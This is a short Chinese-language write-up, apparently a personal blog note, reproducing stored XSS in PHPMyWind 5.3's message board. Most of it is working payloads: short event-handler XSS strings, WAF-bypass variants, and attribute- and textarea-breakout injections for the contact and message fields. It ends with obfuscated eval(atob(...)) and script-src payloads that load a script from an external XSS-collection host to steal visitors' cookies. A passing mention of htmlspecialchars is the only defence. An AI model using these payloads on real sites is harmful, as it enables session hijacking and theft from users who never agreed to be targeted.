XSS--PHPwind5.3复现

xss再分析

短payload

<svg/onload=alert(1)>
<body/onfocus=alert``>
<body/onfocus=confirm``>//过滤alert时用

众多过狗xss payload

防御xss

htmlspecialchars() 函数

把预定义的字符 "<" （小于）和 ">" （大于）转换为 HTML 实体

" onmouseover=alert(0) id="

phpmywind_5-3存储型xss复现

有留言板，尝试插一下





好像有过滤，没搞懂能不能行，尝试一下闭合试一下

<td height="40" align="right">联系方式：</td>
<td><input type="text" name="contact" id="contact" class="input" value="<img src=x onerror=alert(1)>" /></td>

联系方式这可以

" onmouseover=alert(0) id="
"><img src=x onerror=alert(1)><h1 a="

试一试xss平台代码，打不到cookies，应该是长度限制



留言内容绕过



在

<textarea>

标签中代码不会执行尝试先闭合这个标签

应该是可以弹的

</textarea><img src=x onerror=alert(1)><textarea>

结果没弹,这是被过滤了吗？？



看资料，这一个代码可以，没搞懂，只是怎么闭合的呢？？

"><img/src=x onerror=alert(2001)><"'

经过几次测试，好像是反斜杠的原因

"><img src=x onerror=alert(2001)><"'

这样就不行，在试几个

</textarea>
<img /src=x onerror=alert(1)><textarea>

确实是加上反斜杠就弹窗了

然而这样打不到cookies，很迷

<textarea><img /src=xonerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtib2R5LmFwcGVuZENoaWxkKHMpO3Muc3JjPSdodHRwOi8veHNzcHQuY29tL0JONlRLUz8nK01hdGgucmFuZG9tKCk='))></textarea>
</textarea><script /src=http://xxxx.com/BN6TKS?1526612900></script><textarea>

这个不弹窗的竟然能打到，真迷，

"><img src=x onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtib2R5LmFwcGVuZENoaWxkKHMpO3Muc3JjPSdodHRwOi8veHNzcHQuY29tL0JONlRLUz8nK01hdGgucmFuZG9tKCk='))>< h1 a="

参考链接：http://0day5.com/archives/4033/